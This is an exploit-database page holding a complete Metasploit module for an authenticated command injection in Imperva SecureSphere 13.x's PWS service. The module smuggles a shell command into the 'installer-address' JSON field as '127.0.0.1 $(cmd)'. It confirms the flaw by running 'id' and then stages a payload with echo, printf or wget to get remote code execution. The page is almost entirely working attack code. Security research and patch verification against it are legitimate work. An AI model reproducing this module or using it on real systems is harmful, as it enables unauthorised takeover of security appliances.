Imperva SecureSphere 13.x PWS Command Injection

2019.03.07
Credit: rsp3ar
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'Imperva SecureSphere PWS Command Injection', 'Description' => %q( This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode. ), 'License' => MSF_LICENSE, 'Author' => [ 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module ], 'References' => [ [ 'EDB', '45542' ] ], 'DisclosureDate' => "Oct 8 2018", 'DefaultOptions' => { 'SSL' => true, 'PrependFork' => true, }, 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64], 'CmdStagerFlavor' => %w{ echo printf wget }, 'Targets' => [ ['Imperva SecureSphere 13.0/13.1/13.2', {}] ], 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(443), OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']), OptString.new('PASSWORD', [false, 'Agent registration password', '']), OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']), OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15]) ]) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]) ] end def check begin res = execute_command('id') rescue => e vprint_error("#{e}") return CheckCode::Unknown end if res.body =~ /uid=\d+/ return CheckCode::Vulnerable end CheckCode::Safe end def exploit unless CheckCode::Vulnerable == check unless datastore['ForceExploit'] fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.') end print_warning 'Target does not appear to be vulnerable' end print_status("Sending payload #{datastore['PAYLOAD']}") execute_cmdstager end def execute_command(cmd, opts = {}) data = { 'command' => 'impctl server status', 'parameters' => { 'broadcast' => true, 'installer-address' => "127.0.0.1 $(#{cmd})" } } res = send_request data return unless res if res.code == 401 fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required') end unless res.code == 406 && res.body.include?("impctl") fail_with(Failure::Unknown, 'Server did not respond in an expected way') end res end def send_request(data) req_params = { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'data' => data.to_json } if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank? unless @cookie res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/') }) unless res fail_with(Failure::Unreachable, "#{peer} - Connection failed") end @cookie = res.get_cookies end req_params['cookie'] = @cookie req_params['headers'] = { 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) } end send_request_cgi(req_params, datastore['TIMEOUT']) end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top